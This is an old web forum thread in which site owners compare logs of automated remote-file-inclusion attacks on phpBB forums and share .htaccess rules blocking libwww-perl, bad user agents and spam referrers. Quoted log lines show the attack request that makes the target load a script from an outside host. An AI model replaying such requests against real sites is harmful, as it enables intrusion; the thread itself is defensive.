About 200 attacks by day, I'm angry

gameover · New Member Joined: Jan 09, 2005 Posts: 14

Since a few days, I've about 200 attacks by day. Sentinel seems working well but I would like to stop these attacks in a few hours.

A sample :

Date & Time: 2006-10-09 20:52:45 CEST GMT +0200
Blocked IP: 213.193.229.34
User ID: Guest (1)
Reason: Abuse-Filter
--------------------
User Agent: libwww-perl/5.64
Query String:

Only registered users can see links on this board!
Get registered or login to the forums!

Get String:

Only registered users can see links on this board!
Get registered or login to the forums!

Post String:

Only registered users can see links on this board!
Get registered or login to the forums!

Forwarded For: none
Client IP: none
Remote Address: 213.193.229.34
Remote Port: 42429
Request Method: GET

phpbb_root_path, in this case

Only registered users can see links on this board!
Get registered or login to the forums!

is the same day by day and it's that I would like to stop.

Is it possible to dot that with sentinel ?

Thanks for help

srhh · Involved Joined: Dec 27, 2005 Posts: 296

You can try blocking the IP in your htaccess file. Or try changing permissions on forums to registered members only.

I've just turned off alot of my email alerts from sentinel. It's scary to wake up to several dozen hack attempts.
Hopefully at some point they will get the idea their script doesn't work and move on.

srhh · Involved Joined: Dec 27, 2005 Posts: 296

Reporting it to their host can't hurt either.

gameover · New Member Joined: Jan 09, 2005 Posts: 14

srhh wrote:

Reporting it to their host can't hurt either.

It's a good idea ! I've made it in the past but ISP doesn't answer of my mail. ISP has come from different country (Russia, USA, Brasil, and many more). My conclusion is DO NOT CONTACT their ISP, it's loosing time.

Currently since the beginning of this month, I've have about 1000 email report with different IP.

I use NS 2.5.02. (thanks to the author Wink

)

CodyG · Posted: Mon Oct 09, 2006 4:19 pm

I'm getting the same kind of attack.
This creepo is using dozens and dozens of different IPs during each attack.
How does he do that switching IP thing ever second? (maybe I don't want to know.)

For example: notice the host and the date below...

Quote:

Host: 216.127.82.129

*

/modules/Forums/admin/admin_board.php?phpbb_root_path=http://www.yagenoysentoplesen.com/spread.txt?
Http Code: 403 Date: Oct 09 09:48:40 Http Version: HTTP/1.1 Size in Bytes: -
Referer: -
Agent: libwww-perl/5.805

Host: 209.91.225.66

*

/modules/Forums/admin/admin_board.php?phpbb_root_path=http://www.yagenoysentoplesen.com/spread.txt?
Http Code: 403 Date: Oct 09 09:48:39 Http Version: HTTP/1.1 Size in Bytes: -
Referer: -
Agent: libwww-perl/5.803

gregexp · Posted: Mon Oct 09, 2006 6:44 pm

Basically, they load up a bot and try to get an exploit out of a site they think will allow it, Its very easy to do and they are using exploits that no longer work(with the right setup).

There are 2 different recourses, just let sentinel do its job and ban them OR let sentinel do its job and report it to their isp which some believe it to be a waste of time.

montego · Posted: Mon Oct 09, 2006 9:22 pm

I would also place a password on your modules/Forums/admin directory either through your host provided control panel or .htaccess/.staccess, similar to how NukeSentinel works with CGIAuth.

evaders99 · Posted: Tue Oct 10, 2006 10:50 pm

Yea I see this guy as well. I am reporting the abused site (ccfish.biz) to their web host. Yahoo doesn't seem to respond though. I doubt this will stop such things, have to just ignore. I'd also suggest adding a check for libwww-perl directly into your .htaccess file

montego · Posted: Wed Oct 11, 2006 6:47 am

Here is what I use in my .htaccess:

Code:

RewriteCond %{HTTP_USER_AGENT} ^libwww-perl/[0-9].[0-9]* [OR]
RewriteRule ^.*$ http://127.0.0.1 [R,L]

Now, please keep in mind that there is a long list above and below this first line as I have a bunch of user agents that I just refuse to access the server at all. Hence why the [OR] condition.

If you wanted to make something case insensitive, use [NC,OR] instead.

Enjoy!

technocrat · Posted: Wed Oct 11, 2006 7:54 am

Get used to it. One of the hacker sites released a perl script about a month ago and a script kiddie website posted step by step doc on how to use it. Now the kiddies are going to town. Last month alone I had 600 bans on the evo site.

hitwalker · Sells PC To Pay For Divorce Joined: Posts: 5661

c.mon guys....
usualy these sites dont even realise that some bogus file is uploaded and thats mainly because these sites are run by the brainless or by those who trust everybody and think nothing will happen.

i have posted many of these and they all work the same.
the file gets uploaded and the address gets spread out...
dump this in google... ccfish.biz/c.txt

my sugggestion is simply to ban most hacking and spam countries,that would be about 30 of them...
dump the ranges in the htaccess and your done...

gameover · New Member Joined: Jan 09, 2005 Posts: 14

montego wrote:

I would also place a password on your modules/Forums/admin directory either through your host provided control panel or .htaccess/.staccess, similar to how NukeSentinel works with CGIAuth.

Good idea ! I've made this. This is not the final solution but another bricks in the wall Wink

XenoMorpH · Posted: Thu Oct 12, 2006 8:50 am

Hmmm, I almost have the same problem...getting more than 20 IP's blocked in just one day: (Sentinel 2.5.02)

User Agent: libwww-perl/5.79
Query String:

Only registered users can see links on this board!
Get registered or login to the forums!

Get String:

Only registered users can see links on this board!
Get registered or login to the forums!

Post String:

Only registered users can see links on this board!
Get registered or login to the forums!

Forwarded For: none
Client IP: none
Remote Address: 62.149.140.53
Remote Port: 49435
Request Method: GET
--------------------
Who-Is for IP
62.149.140.53

Allmost all Ip's which are getting blocked are harvest blocking. But I can't imagine all are blocked cuz they harvest, and I think innocent people are getting blocked.
How can Sentinel c if people are using harvest programmes?
Any Idea's?

evaders99 · Posted: Thu Oct 12, 2006 10:54 am

No "innocent" people use libwww-perl. All normal browsers will return some Useragent (unless they are using some stealthy firewall)
That is telling you that a script is being used to access your site.

I am using DisError as well. That Query string almost certainly indicates this is a robot being denied entry with a Forbidden error

XenoMorpH · Posted: Thu Oct 12, 2006 11:00 am

Tnx fo the answer

Donovan · Client Joined: Oct 07, 2003 Posts: 735 Location: Ohio

montego wrote:

Here is what I use in my .htaccess:

Code:

RewriteCond %{HTTP_USER_AGENT} ^libwww-perl/[0-9].[0-9]* [OR]
RewriteRule ^.*$ http://127.0.0.1 [R,L]

Where exactly does this go?

Can you give me an example?

gameover · New Member Joined: Jan 09, 2005 Posts: 14

Donovan wrote:

montego wrote:

Here is what I use in my .htaccess:

Code:

RewriteCond %{HTTP_USER_AGENT} ^libwww-perl/[0-9].[0-9]* [OR]
RewriteRule ^.*$ http://127.0.0.1 [R,L]

Where exactly does this go?

Can you give me an example?

Include that in your .htaccess file in your directory "public_html" of your website.

Donovan · Client Joined: Oct 07, 2003 Posts: 735 Location: Ohio

I should have been clearer. Where does this go within the .htaccess file?

montego · Posted: Fri Oct 20, 2006 6:41 pm

It can go almost anywhere, but certainly before where NukeSentinel is writing the blocked IPs and I personally have grouped all Rewrite rules together and wrapped them in-between:

RewriteEngine on

<<statements>>

RewriteEngine off

kguske · Site Admin Joined: Jun 04, 2004 Posts: 6044

Hey montego - why not share the whole list?

montego · Posted: Thu Oct 26, 2006 6:19 am

Well, I got the list from VinDSL in a forum post somewhere. Since it was quite old, and I have NO TIME to validate it, I am posting it here AS-IS and with no warranties, expressed or otherwise... killing me

Code:

#
# Bad User Agents
#
RewriteCond %{HTTP_USER_AGENT} ^Alexibot [OR]
RewriteCond %{HTTP_USER_AGENT} ^asterias [OR]
RewriteCond %{HTTP_USER_AGENT} ^BackDoorBot [OR]
RewriteCond %{HTTP_USER_AGENT} ^Black.Hole [OR]
RewriteCond %{HTTP_USER_AGENT} ^BlackWidow [OR]
RewriteCond %{HTTP_USER_AGENT} ^BlowFish [OR]
RewriteCond %{HTTP_USER_AGENT} ^BotALot [OR]
RewriteCond %{HTTP_USER_AGENT} ^BuiltBotTough [OR]
RewriteCond %{HTTP_USER_AGENT} ^Bullseye [OR]
RewriteCond %{HTTP_USER_AGENT} ^BunnySlippers [OR]
RewriteCond %{HTTP_USER_AGENT} ^Cegbfeieh [OR]
RewriteCond %{HTTP_USER_AGENT} ^CheeseBot [OR]
RewriteCond %{HTTP_USER_AGENT} ^CherryPicker [OR]
RewriteCond %{HTTP_USER_AGENT} ^ChinaClaw [OR]
RewriteCond %{HTTP_USER_AGENT} ^CopyRightCheck [OR]
RewriteCond %{HTTP_USER_AGENT} ^cosmos [OR]
RewriteCond %{HTTP_USER_AGENT} ^Crescent [OR]
RewriteCond %{HTTP_USER_AGENT} ^Custo [OR]
RewriteCond %{HTTP_USER_AGENT} ^DISCo [OR]
RewriteCond %{HTTP_USER_AGENT} ^DittoSpyder [OR]
RewriteCond %{HTTP_USER_AGENT} ^Download\ Demon [OR]
RewriteCond %{HTTP_USER_AGENT} ^eCatch [OR]
RewriteCond %{HTTP_USER_AGENT} ^EirGrabber [OR]
RewriteCond %{HTTP_USER_AGENT} ^EmailCollector [OR]
RewriteCond %{HTTP_USER_AGENT} ^EmailSiphon [OR]
RewriteCond %{HTTP_USER_AGENT} ^EmailWolf [OR]
RewriteCond %{HTTP_USER_AGENT} ^EroCrawler [OR]
RewriteCond %{HTTP_USER_AGENT} ^Express\ WebPictures [OR]
RewriteCond %{HTTP_USER_AGENT} ^ExtractorPro [OR]
RewriteCond %{HTTP_USER_AGENT} ^EyeNetIE [OR]
RewriteCond %{HTTP_USER_AGENT} ^FlashGet [OR]
RewriteCond %{HTTP_USER_AGENT} ^Foobot [OR]
RewriteCond %{HTTP_USER_AGENT} ^FrontPage [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^f*** [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^GetRight [OR]
RewriteCond %{HTTP_USER_AGENT} ^GetWeb! [OR]
RewriteCond %{HTTP_USER_AGENT} ^Go-Ahead-Got-It [OR]
RewriteCond %{HTTP_USER_AGENT} ^Googlebot-Image [OR]
RewriteCond %{HTTP_USER_AGENT} ^Go!Zilla [OR]
RewriteCond %{HTTP_USER_AGENT} ^GrabNet [OR]
RewriteCond %{HTTP_USER_AGENT} ^Grafula [OR]
RewriteCond %{HTTP_USER_AGENT} ^Harvest [OR]
RewriteCond %{HTTP_USER_AGENT} ^hloader [OR]
RewriteCond %{HTTP_USER_AGENT} ^HMView [OR]
RewriteCond %{HTTP_USER_AGENT} ^httplib [OR]
RewriteCond %{HTTP_USER_AGENT} ^HTTrack [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^humanlinks [OR]
RewriteCond %{HTTP_USER_AGENT} ^ia_archiver [OR]
RewriteCond %{HTTP_USER_AGENT} ^Image\ Stripper [OR]
RewriteCond %{HTTP_USER_AGENT} ^Image\ Sucker [OR]
RewriteCond %{HTTP_USER_AGENT} ^Indy\ Library [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^InfoNaviRobot [OR]
RewriteCond %{HTTP_USER_AGENT} ^InterGET [OR]
RewriteCond %{HTTP_USER_AGENT} ^Internet\ Ninja [OR]
RewriteCond %{HTTP_USER_AGENT} ^JennyBot [OR]
RewriteCond %{HTTP_USER_AGENT} ^JetCar [OR]
RewriteCond %{HTTP_USER_AGENT} ^JOC\ Web\ Spider [OR]
RewriteCond %{HTTP_USER_AGENT} ^Kenjin.Spider [OR]
RewriteCond %{HTTP_USER_AGENT} ^Keyword.Density [OR]
RewriteCond %{HTTP_USER_AGENT} ^larbin [OR]
RewriteCond %{HTTP_USER_AGENT} ^LeechFTP [OR]
RewriteCond %{HTTP_USER_AGENT} ^LexiBot [OR]
RewriteCond %{HTTP_USER_AGENT} ^libWeb/clsHTTP [OR]
RewriteCond %{HTTP_USER_AGENT} ^LinkextractorPro [OR]
RewriteCond %{HTTP_USER_AGENT} ^LinkScan/8.1a.Unix [OR]
RewriteCond %{HTTP_USER_AGENT} ^LinkWalker [OR]
RewriteCond %{HTTP_USER_AGENT} ^LWP [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^lwp-trivial [OR]
RewriteCond %{HTTP_USER_AGENT} ^libwww-perl/[0-9].[0-9]* [OR]
RewriteCond %{HTTP_USER_AGENT} ^Mass\ Downloader [OR]
RewriteCond %{HTTP_USER_AGENT} ^Mata.Hari [OR]
RewriteCond %{HTTP_USER_AGENT} ^Microsoft.URL [OR]
RewriteCond %{HTTP_USER_AGENT} ^MIDown\ tool [OR]
RewriteCond %{HTTP_USER_AGENT} ^MIIxpc [OR]
RewriteCond %{HTTP_USER_AGENT} ^Mister.PiX [OR]
RewriteCond %{HTTP_USER_AGENT} ^Mister\ PiX [OR]
RewriteCond %{HTTP_USER_AGENT} ^moget [OR]
RewriteCond %{HTTP_USER_AGENT} ^Mozilla/2 [OR]
RewriteCond %{HTTP_USER_AGENT} ^Mozilla/3.Mozilla/2.01 [OR]
RewriteCond %{HTTP_USER_AGENT} ^Mozilla.*NEWT [OR]
RewriteCond %{HTTP_USER_AGENT} ^Navroad [OR]
RewriteCond %{HTTP_USER_AGENT} ^NearSite [OR]
RewriteCond %{HTTP_USER_AGENT} ^NetAnts [OR]
RewriteCond %{HTTP_USER_AGENT} ^NetMechanic [OR]
RewriteCond %{HTTP_USER_AGENT} ^NetSpider [OR]
RewriteCond %{HTTP_USER_AGENT} ^Net\ Vampire [OR]
RewriteCond %{HTTP_USER_AGENT} ^NetZIP [OR]
RewriteCond %{HTTP_USER_AGENT} ^NICErsPRO [OR]
RewriteCond %{HTTP_USER_AGENT} ^NPBot [OR]
RewriteCond %{HTTP_USER_AGENT} ^Octopus [OR]
RewriteCond %{HTTP_USER_AGENT} ^Offline.Explorer [OR]
RewriteCond %{HTTP_USER_AGENT} ^Offline\ Explorer [OR]
RewriteCond %{HTTP_USER_AGENT} ^Offline\ Navigator [OR]
RewriteCond %{HTTP_USER_AGENT} ^Openfind [OR]
RewriteCond %{HTTP_USER_AGENT} ^PageGrabber [OR]
RewriteCond %{HTTP_USER_AGENT} ^Papa\ Foto [OR]
RewriteCond %{HTTP_USER_AGENT} ^pavuk [OR]
RewriteCond %{HTTP_USER_AGENT} ^pcBrowser [OR]
RewriteCond %{HTTP_USER_AGENT} ^PlantyNet_WebRobot [OR]
RewriteCond %{HTTP_USER_AGENT} ^ProPowerBot/2.14 [OR]
RewriteCond %{HTTP_USER_AGENT} ^ProWebWalker [OR]
RewriteCond %{HTTP_USER_AGENT} ^ProWebWalker [OR]
RewriteCond %{HTTP_USER_AGENT} ^QueryN.Metasearch [OR]
RewriteCond %{HTTP_USER_AGENT} ^ReGet [OR]
RewriteCond %{HTTP_USER_AGENT} ^RepoMonkey [OR]
RewriteCond %{HTTP_USER_AGENT} ^RMA [OR]
RewriteCond %{HTTP_USER_AGENT} ^SiteSnagger [OR]
RewriteCond %{HTTP_USER_AGENT} ^SlySearch [OR]
RewriteCond %{HTTP_USER_AGENT} ^SmartDownload [OR]
RewriteCond %{HTTP_USER_AGENT} ^SpankBot [OR]
RewriteCond %{HTTP_USER_AGENT} ^spanner [OR]
RewriteCond %{HTTP_USER_AGENT} ^SuperBot [OR]
RewriteCond %{HTTP_USER_AGENT} ^SuperHTTP [OR]
RewriteCond %{HTTP_USER_AGENT} ^Surfbot [OR]
RewriteCond %{HTTP_USER_AGENT} ^suzuran [OR]
RewriteCond %{HTTP_USER_AGENT} ^Szukacz/1.4 [OR]
RewriteCond %{HTTP_USER_AGENT} ^tAkeOut [OR]
RewriteCond %{HTTP_USER_AGENT} ^Teleport [OR]
RewriteCond %{HTTP_USER_AGENT} ^Teleport\ Pro [OR]
RewriteCond %{HTTP_USER_AGENT} ^Telesoft [OR]
RewriteCond %{HTTP_USER_AGENT} ^The.Intraformant [OR]
RewriteCond %{HTTP_USER_AGENT} ^TheNomad [OR]
RewriteCond %{HTTP_USER_AGENT} ^TightTwatBot [OR]
RewriteCond %{HTTP_USER_AGENT} ^Titan [OR]
RewriteCond %{HTTP_USER_AGENT} ^toCrawl/UrlDispatcher [OR]
RewriteCond %{HTTP_USER_AGENT} ^toCrawl/UrlDispatcher [OR]
RewriteCond %{HTTP_USER_AGENT} ^Turing [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^True_Robot [OR]
RewriteCond %{HTTP_USER_AGENT} ^turingos [OR]
RewriteCond %{HTTP_USER_AGENT} ^TurnitinBot/1.5 [OR]
RewriteCond %{HTTP_USER_AGENT} ^URLy.Warning [OR]
RewriteCond %{HTTP_USER_AGENT} ^VCI [OR]
RewriteCond %{HTTP_USER_AGENT} ^VoidEYE [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebAuto [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebBandit [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebCopier [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebEMailExtrac.* [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebEnhancer [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebFetch [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebGo\ IS [OR]
RewriteCond %{HTTP_USER_AGENT} ^Web.Image.Collector [OR]
RewriteCond %{HTTP_USER_AGENT} ^Web\ Image\ Collector [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebLeacher [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebmasterWorldForumBot [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebReaper [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebSauger [OR]
RewriteCond %{HTTP_USER_AGENT} ^Website\ eXtractor [OR]
RewriteCond %{HTTP_USER_AGENT} ^Website.Quester [OR]
RewriteCond %{HTTP_USER_AGENT} ^Website\ Quester [OR]
RewriteCond %{HTTP_USER_AGENT} ^Webster.Pro [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebStripper [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebStripper [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebWhacker [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebZip [OR]
RewriteCond %{HTTP_USER_AGENT} ^Wget [OR]
RewriteCond %{HTTP_USER_AGENT} ^Widow [OR]
RewriteCond %{HTTP_USER_AGENT} ^[Ww]eb[Bb]andit [OR]
RewriteCond %{HTTP_USER_AGENT} ^WWW-Collector-E [OR]
RewriteCond %{HTTP_USER_AGENT} ^WWWOFFLE [OR]
RewriteCond %{HTTP_USER_AGENT} ^Xaldon\ WebSpider [OR]
RewriteCond %{HTTP_USER_AGENT} ^Xenu's [OR]
RewriteCond %{HTTP_USER_AGENT} ^Yahoo!\ Slurp\ China [OR]
RewriteCond %{HTTP_USER_AGENT} ^Zeus
RewriteRule ^.*$ http://127.0.0.1 [R,L]

################################################
# From VinDSL on 7/6/2006 to block referrers
################################################
#
#Block referers based on KEYWORDS anywhere in their URL.
#
RewriteCond %{HTTP_REFERER} ^(http://)?(www\.)?.*(-|.)4free(-|.).*$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^(http://)?(www\.)?.*(-|.)4u(-|.).*$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^(http://)?(www\.)?.*(-|.)6q(-|.).*$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^(http://)?(www\.)?.*(-|.)a2z(-|.).*$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^(http://)?(www\.)?.*(-|.)accept(-|.).*$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^(http://)?(www\.)?.*(-|.)adult(-|.).*$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^(http://)?(www\.)?.*(-|.)affiliate(-|.).*$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^(http://)?(www\.)?.*(-|.)alumni(-|.).*$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^(http://)?(www\.)?.*(-|.)amateur(-|.).*$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^(http://)?(www\.)?.*(-|.)apply(-|.).*$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^(http://)?(www\.)?.*(-|.)ambien(-|.).*$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^(http://)?(www\.)?.*(-|.)anal(-|.).*$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^(http://)?(www\.)?.*(-|.)associate(-|.).*$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^(http://)?(www\.)?.*(-|.)atlanta(-|.).*$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^(http://)?(www\.)?.*(-|.)azian(-|.).*$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^(http://)?(www\.)?.*(-|.)bank(-|.).*$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^(http://)?(www\.)?.*(-|.)biz(-|.).*$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^(http://)?(www\.)?.*(-|.)blackjack(-|.).*$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^(http://)?(www\.)?.*(-|.)busty(-|.).*$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^(http://)?(www\.)?.*(-|.)brokers(-|.).*$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^(http://)?(www\.)?.*(-|.)casino(-|.).*$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^(http://)?(www\.)?.*(-|.)cash(-|.).*$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^(http://)?(www\.)?.*(-|.)celebrex(-|.).*$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^(http://)?(www\.)?.*(-|.)cialis(-|.).*$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^(http://)?(www\.)?.*(-|.)condo(-|.).*$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^(http://)?(www\.)?.*(-|.)cpa(-|.).*$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^(http://)?(www\.)?.*(-|.)credit(-|.).*$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^(http://)?(www\.)?.*(-|.)dating(-|.).*$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^(http://)?(www\.)?.*(-|.)debt(-|.).*$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^(http://)?(www\.)?.*(-|.)devil(-|.).*$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^(http://)?(www\.)?.*(-|.)diet(-|.).*$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^(http://)?(www\.)?.*(-|.)discount(-|.).*$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^(http://)?(www\.)?.*(-|.)dvd(-|.).*$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^(http://)?(www\.)?.*(-|.)easy(-|.).*$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^(http://)?(www\.)?.*(-|.)emedia(-|.).*$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^(http://)?(www\.)?.*(-|.)enterprise(-|.).*$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^(http://)?(www\.)?.*(-|.)episode(-|.).*$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^(http://)?(www\.)?.*(-|.)escort(-|.).*$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^(http://)?(www\.)?.*(-|.)farm(-|.).*$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^(http://)?(www\.)?.*(-|.)fidelity(-|.).*$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^(http://)?(www\.)?.*(-|.)formula(-|.).*$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^(http://)?(www\.)?.*(-|.)foundation(-|.).*$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^(http://)?(www\.)?.*(-|.)fu*k(-|.).*$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^(http://)?(www\.)?.*(-|.)gambling(-|.).*$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^(http://)?(www\.)?.*(-|.)gay(-|.).*$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^(http://)?(www\.)?.*(-|.)holdem(-|.).*$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^(http://)?(www\.)?.*(-|.)home(-|.).*$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^(http://)?(www\.)?.*(-|.)horny(-|.).*$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^(http://)?(www\.)?.*(-|.)hotel(-|.).*$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^(http://)?(www\.)?.*(-|.)house(-|.).*$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^(http://)?(www\.)?.*(-|.)hydrocodone(-|.).*$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^(http://)?(www\.)?.*(-|.)incest(-|.).*$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^(http://)?(www\.)?.*(-|.)insurance(-|.).*$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^(http://)?(www\.)?.*(-|.)jerusalem(-|.).*$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^(http://)?(www\.)?.*(-|.)lesbian(-|.).*$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^(http://)?(www\.)?.*(-|.)levitra(-|.).*$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^(http://)?(www\.)?.*(-|.)lighting(-|.).*$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^(http://)?(www\.)?.*(-|.)loan(-|.).*$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^(http://)?(www\.)?.*(-|.)locator(-|.).*$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^(http://)?(www\.)?.*(-|.)lotto(-|.).*$ [NC,OR]
#RewriteCond %{HTTP_REFERER} ^(http://)?(www\.)?.*(-|.)mail(-|.).*$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^(http://)?(www\.)?.*(-|.)mall(-|.).*$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^(http://)?(www\.)?.*(-|.)mature(-|.).*$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^(http://)?(www\.)?.*(-|.)merchant(-|.).*$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^(http://)?(www\.)?.*(-|.)milf(-|.).*$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^(http://)?(www\.)?.*(-|.)money(-|.).*$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^(http://)?(www\.)?.*(-|.)mortgage(-|.).*$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^(http://)?(www\.)?.*(-|.)myhost(-|.).*$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^(http://)?(www\.)?.*(-|.)nasty(-|.).*$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^(http://)?(www\.)?.*(-|.)nude(-|.).*$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^(http://)?(www\.)?.*(-|.)pain\-killers(-|.).*$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^(http://)?(www\.)?.*(-|.)paxil(-|.).*$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^(http://)?(www\.)?.*(-|.)pharmacies(-|.).*$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^(http://)?(www\.)?.*(-|.)pharmacy(-|.).*$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^(http://)?(www\.)?.*(-|.)phentermine(-|.).*$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^(http://)?(www\.)?.*(-|.)poker(-|.).*$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^(http://)?(www\.)?.*(-|.)porn(-|.).*$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^(http://)?(www\.)?.*(-|.)properties(-|.).*$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^(http://)?(www\.)?.*(-|.)prozac(-|.).*$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^(http://)?(www\.)?.*(-|.)pus*y(-|.).*$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^(http://)?(www\.)?.*(-|.)rental(-|.).*$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^(http://)?(www\.)?.*(-|.)sex(-|.).*$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^(http://)?(www\.)?.*(-|.)slots(-|.).*$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^(http://)?(www\.)?.*(-|.)soma(-|.).*$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^(http://)?(www\.)?.*(-|.)sport(-|.).*$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^(http://)?(www\.)?.*(-|.)swinger(-|.).*$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^(http://)?(www\.)?.*(-|.)teen(-|.).*$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^(http://)?(www\.)?.*(-|.)texas(-|.).*$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^(http://)?(www\.)?.*(-|.)thai(-|.).*$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^(http://)?(www\.)?.*(-|.)tits(-|.).*$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^(http://)?(www\.)?.*(-|.)ultram(-|.).*$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^(http://)?(www\.)?.*(-|.)valium(-|.).*$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^(http://)?(www\.)?.*(-|.)vegas(-|.).*$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^(http://)?(www\.)?.*(-|.)viagra(-|.).*$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^(http://)?(www\.)?.*(-|.)vicodin(-|.).*$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^(http://)?(www\.)?.*(-|.)visor(-|.).*$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^(http://)?(www\.)?.*(-|.)warez(-|.).*$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^(http://)?(www\.)?.*(-|.)watches(-|.).*$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^(http://)?(www\.)?.*(-|.)weight(-|.).*$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^(http://)?(www\.)?.*(-|.)xanax(-|.).*$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^(http://)?(www\.)?.*(-|.)xxx(-|.).*$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^(http://)?(www\.)?.*(-|.)yacht(-|.).*$ [NC,OR]
#
#Block referers from specific web sites.
#
RewriteCond %{HTTP_REFERER} (21pod) [NC,OR]
RewriteCond %{HTTP_REFERER} (250x) [NC,OR]
RewriteCond %{HTTP_REFERER} (4italiancharms) [NC,OR]
RewriteCond %{HTTP_REFERER} (9sekund) [NC,OR]
